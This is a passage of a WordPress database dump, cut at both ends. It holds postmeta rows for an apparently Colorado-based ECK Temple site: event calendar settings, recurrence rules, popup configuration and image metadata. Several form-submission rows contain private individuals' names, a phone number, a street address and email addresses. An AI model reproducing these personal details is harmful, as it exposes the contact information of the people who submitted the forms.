"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(121027,263190,'smush-info','The file was compressed from 73.32 KB to 69.07 KB saving 5.8 percent using WP-Optimize'),(121026,263190,'original-file','2021/01/eck-temple-co-nd-2-updraft-pre-smush-original.jpg'),(120239,263009,'_field_30','Michael'),(120240,263009,'_field_31','Merriman'),(120241,263009,'_field_32','(303) 589-2364'),(120242,263009,'_field_33',''),(120243,263009,'_field_34','812 Kimball Ave Ste B'),(120244,263009,'_field_35','Grand Junction'),(120245,263009,'_field_36','CO'),(120246,263009,'_field_37','US'),(120247,263009,'_field_39',''),(120248,263009,'_form_id','4'),(120249,263009,'_seq_num','10'),(120250,91821,'passster_activate_protection',NULL),(120251,91821,'passster_protection_type','password'),(132617,263855,'_wp_attached_file','2021/02/ninja-forms-success-bk-1.jpg'),(132618,263855,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:847;s:4:\"file\";s:36:\"2021/02/ninja-forms-success-bk-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"ninja-forms-success-bk-1-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"ninja-forms-success-bk-1-1024x678.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"ninja-forms-success-bk-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"ninja-forms-success-bk-1-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"ninja-forms-success-bk-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143420,265125,'_field_427','songwriter999@gmail.com'),(120254,263018,'protect_children',''),(120255,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120256,263018,'_EventOrigin','events-calendar'),(120257,263018,'protect_children',''),(120258,263018,'protect_children',''),(120259,263018,'protect_children',''),(120260,263018,'protect_children',''),(120261,263018,'protect_children',''),(120262,263018,'protect_children',''),(120263,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(120285,263018,'_EventStartDateUTC','2021-01-07 02:00:00'),(120287,263018,'_EventDuration','3600'),(120264,263018,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609083122;s:12:\"_EventOrigin\";i:1609083122;s:13:\"_thumbnail_id\";i:1609515800;s:24:\"boldgrid_hide_page_title\";i:1609083122;s:17:\"_EventShowMapLink\";i:1609083122;s:13:\"_EventShowMap\";i:1609083122;s:15:\"_EventStartDate\";i:1609084049;s:13:\"_EventEndDate\";i:1609084049;s:18:\"_EventStartDateUTC\";i:1609084049;s:16:\"_EventEndDateUTC\";i:1609084049;s:14:\"_EventDuration\";i:1609083122;s:20:\"_EventCurrencySymbol\";i:1609083122;s:22:\"_EventCurrencyPosition\";i:1609083122;s:10:\"_EventCost\";i:1609083122;s:9:\"_EventURL\";i:1609083122;s:14:\"_EventTimezone\";i:1609083122;s:18:\"_EventTimezoneAbbr\";i:1609083122;s:27:\"_EventNextPendingRecurrence\";i:1609083122;s:26:\"_RTECregistrationsDisabled\";i:1609083122;s:17:\"_RTECdeadlineType\";i:1609083122;s:19:\"_RTECwhoCanRegister\";i:1609083122;s:23:\"_RTEClimitRegistrations\";i:1609083122;s:21:\"_RTECmaxRegistrations\";i:1609083122;s:16:\"_EventRecurrence\";i:1609083122;s:18:\"_RTECnumRegistered\";i:1609083122;s:13:\"_EventVenueID\";i:1609083122;s:12:\"_dp_original\";i:1609083122;s:16:\"tribe_events_cat\";i:1609541000;s:10:\"_edit_last\";i:1609083194;s:10:\"post_title\";i:1609515596;s:12:\"post_content\";i:1609515596;s:11:\"post_status\";i:1609084049;}'),(116766,262872,'_EventStartDateUTC','2021-02-07 18:30:00'),(146740,265639,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-10-19\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-10-19\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(94770,261877,'popup_title',''),(94769,261877,'boldgrid_hide_page_title','0'),(94480,261784,'_form_id','21'),(143533,265138,'_wp_attached_file','2021/06/rountable-notext-2021.jpg'),(143534,265138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:385;s:4:\"file\";s:33:\"2021/06/rountable-notext-2021.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"rountable-notext-2021-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94768,261877,'popup_settings','a:39:{s:8:\"theme_id\";s:6:\"132183\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:10:\"center top\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:10:\"conditions\";a:0:{}s:8:\"triggers\";a:0:{}s:7:\"cookies\";a:0:{}s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(125318,263323,'boldgrid_hide_page_title','0'),(125605,263349,'protect_children',''),(125606,263349,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610630517;s:12:\"_EventOrigin\";i:1610630517;s:13:\"_thumbnail_id\";i:1610630517;s:26:\"_RTECregistrationsDisabled\";i:1610630517;s:17:\"_RTECdeadlineType\";i:1610630517;s:19:\"_RTECwhoCanRegister\";i:1610630517;s:23:\"_RTEClimitRegistrations\";i:1610630517;s:21:\"_RTECmaxRegistrations\";i:1610630517;s:24:\"boldgrid_hide_page_title\";i:1610630517;s:16:\"_EventRecurrence\";i:1611953568;s:17:\"_EventShowMapLink\";i:1610630517;s:13:\"_EventShowMap\";i:1610630517;s:13:\"_EventVenueID\";i:1611952622;s:15:\"_EventStartDate\";i:1611952446;s:13:\"_EventEndDate\";i:1611952446;s:18:\"_EventStartDateUTC\";i:1611952446;s:16:\"_EventEndDateUTC\";i:1611952446;s:14:\"_EventDuration\";i:1611952446;s:20:\"_EventCurrencySymbol\";i:1610630517;s:22:\"_EventCurrencyPosition\";i:1610630517;s:10:\"_EventCost\";i:1610630517;s:9:\"_EventURL\";i:1610630517;s:14:\"_EventTimezone\";i:1610630517;s:18:\"_EventTimezoneAbbr\";i:1611952446;s:12:\"_dp_original\";i:1610630517;s:10:\"_edit_last\";i:1610630587;s:10:\"post_title\";i:1611953568;s:12:\"post_content\";i:1611952446;s:16:\"tribe_events_cat\";i:1611977646;s:11:\"post_status\";i:1610630656;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953569;}'),(125607,263349,'_EventOrigin','events-calendar'),(125320,263323,'_EventShowMapLink','1'),(125321,263323,'_EventShowMap','1'),(125322,263323,'_EventVenueID','262507'),(125309,263323,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(28938,201534,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";i:1575542951;s:13:\"_thumbnail_id\";i:1575542951;s:24:\"boldgrid_hide_page_title\";i:1575542951;s:16:\"_EventRecurrence\";i:1606922668;s:17:\"_EventShowMapLink\";i:1575542951;s:13:\"_EventShowMap\";i:1575542951;s:13:\"_EventVenueID\";i:1575542951;s:15:\"_EventStartDate\";i:1576679298;s:13:\"_EventEndDate\";i:1576679298;s:18:\"_EventStartDateUTC\";i:1576679298;s:16:\"_EventEndDateUTC\";i:1576679298;s:14:\"_EventDuration\";i:1575542951;s:20:\"_EventCurrencySymbol\";i:1575542951;s:22:\"_EventCurrencyPosition\";i:1575542951;s:10:\"_EventCost\";i:1575542951;s:9:\"_EventURL\";i:1575542951;s:14:\"_EventTimezone\";i:1575542951;s:18:\"_EventTimezoneAbbr\";i:1575542951;s:16:\"tribe_events_cat\";i:1575568151;s:12:\"_dp_original\";i:1575542951;s:10:\"_edit_last\";i:1576678963;s:10:\"post_title\";i:1576681587;s:12:\"post_content\";i:1576679298;s:11:\"post_status\";i:1576679298;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606924329;s:16:\"protect_children\";i:1606922668;s:26:\"_RTECregistrationsDisabled\";i:1606922668;s:17:\"_RTECdeadlineType\";i:1606922668;s:19:\"_RTECwhoCanRegister\";i:1606922668;s:23:\"_RTEClimitRegistrations\";i:1606922668;s:21:\"_RTECmaxRegistrations\";i:1606922668;s:22:\"_EventHideFromUpcoming\";i:1606922668;}'),(28947,201534,'_EventStartDateUTC','2019-12-01 18:30:00'),(28946,201534,'_EventEndDate','2019-12-01 12:45:00'),(125445,263328,'_EventShowMapLink','1'),(125446,263328,'_EventShowMap','1'),(125447,263328,'_EventVenueID','262507'),(125448,263328,'_EventCurrencySymbol',''),(125449,263328,'_EventCurrencyPosition','prefix'),(125432,263328,'protect_children',''),(125433,263328,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125443,263328,'boldgrid_hide_page_title','0'),(125444,263328,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125406,263327,'protect_children',''),(125407,263327,'protect_children',''),(125408,263327,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(28944,201534,'_EventVenueID','51976'),(28942,201534,'_EventShowMapLink','1'),(104830,128132,'_EventVenueID','262517'),(104780,261877,'popup_conversion_count','0'),(104781,161672,'popup_conversion_count','0'),(104782,132374,'popup_conversion_count','0'),(104783,262513,'protect_children',''),(104784,262513,'data_version','3'),(104785,262513,'popup_open_count','89'),(104786,262513,'boldgrid_hide_page_title','0'),(104787,262513,'popup_title',''),(104788,262513,'popup_settings','a:39:{s:8:\"theme_id\";s:6:\"132185\";s:4:\"size\";s:5:\"small\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:10:\"center top\";s:12:\"position_top\";s:2:\"20\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:10:\"conditions\";a:0:{}s:8:\"triggers\";a:0:{}s:7:\"cookies\";a:0:{}s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:15:\"enterprise-blue\";}'),(95573,262063,'_field_225','Lehmann'),(95574,262063,'_field_226','leanurse@gmail.com'),(95575,262063,'_field_227','CO'),(95576,262063,'_field_228','US'),(95577,262063,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(95578,262063,'_form_id','21'),(95579,262063,'_seq_num','106'),(28943,201534,'_EventShowMap','1'),(95572,262063,'_field_224','Leanore'),(125361,263325,'_EventOrigin','events-calendar'),(125360,263325,'_EventOrigin','events-calendar'),(28940,201534,'boldgrid_hide_page_title','1'),(28936,201534,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";i:1575542951;s:13:\"_thumbnail_id\";i:1575542951;s:24:\"boldgrid_hide_page_title\";i:1575542951;s:16:\"_EventRecurrence\";i:1606922668;s:17:\"_EventShowMapLink\";i:1575542951;s:13:\"_EventShowMap\";i:1575542951;s:13:\"_EventVenueID\";i:1575542951;s:15:\"_EventStartDate\";i:1576679298;s:13:\"_EventEndDate\";i:1576679298;s:18:\"_EventStartDateUTC\";i:1576679298;s:16:\"_EventEndDateUTC\";i:1576679298;s:14:\"_EventDuration\";i:1575542951;s:20:\"_EventCurrencySymbol\";i:1575542951;s:22:\"_EventCurrencyPosition\";i:1575542951;s:10:\"_EventCost\";i:1575542951;s:9:\"_EventURL\";i:1575542951;s:14:\"_EventTimezone\";i:1575542951;s:18:\"_EventTimezoneAbbr\";i:1575542951;s:16:\"tribe_events_cat\";i:1575568151;s:12:\"_dp_original\";i:1575542951;s:10:\"_edit_last\";i:1576678963;s:10:\"post_title\";i:1576681587;s:12:\"post_content\";i:1576679298;s:11:\"post_status\";i:1576679298;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606924329;s:16:\"protect_children\";i:1606922668;s:26:\"_RTECregistrationsDisabled\";i:1606922668;s:17:\"_RTECdeadlineType\";i:1606922668;s:19:\"_RTECwhoCanRegister\";i:1606922668;s:23:\"_RTEClimitRegistrations\";i:1606922668;s:21:\"_RTECmaxRegistrations\";i:1606922668;s:22:\"_EventHideFromUpcoming\";i:1606922668;}'),(28935,201534,'_EventOrigin','events-calendar'),(28941,201534,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103566,201534,'_EventHideFromUpcoming','yes'),(122272,263249,'_RTEClimitRegistrations','0'),(122260,263249,'_EventShowMapLink','1'),(122261,263249,'_EventShowMap','1'),(122262,263249,'_EventCurrencySymbol',''),(122263,263249,'_EventCurrencyPosition','prefix'),(122264,263249,'_EventCost',''),(122257,263249,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(28937,201534,'_EventOrigin','events-calendar'),(28945,201534,'_EventStartDate','2019-12-01 11:30:00'),(28948,201534,'_EventEndDateUTC','2019-12-01 19:45:00'),(28949,201534,'_EventDuration','4500'),(28950,201534,'_EventCurrencySymbol',''),(28951,201534,'_EventCurrencyPosition','prefix'),(28952,201534,'_EventCost',''),(28953,201534,'_EventURL',''),(28954,201534,'_EventTimezone','America/Denver'),(28955,201534,'_EventTimezoneAbbr','MST'),(28956,201534,'_dp_original','201263'),(28957,201534,'_edit_lock','1606947873:2'),(125313,263323,'_RTECregistrationsDisabled','1'),(125314,263323,'_RTECdeadlineType','start'),(125315,263323,'_RTECwhoCanRegister','any'),(125452,263328,'_EventTimezone','America/Denver'),(125453,263328,'_dp_original','263319'),(125454,263328,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125450,263328,'_EventCost',''),(125451,263328,'_EventURL',''),(125442,263328,'_RTECmaxRegistrations','30'),(122125,263245,'_RTECregistrationsDisabled','1'),(122126,263245,'_RTECdeadlineType','start'),(122127,263245,'_RTECwhoCanRegister','any'),(122115,263245,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"t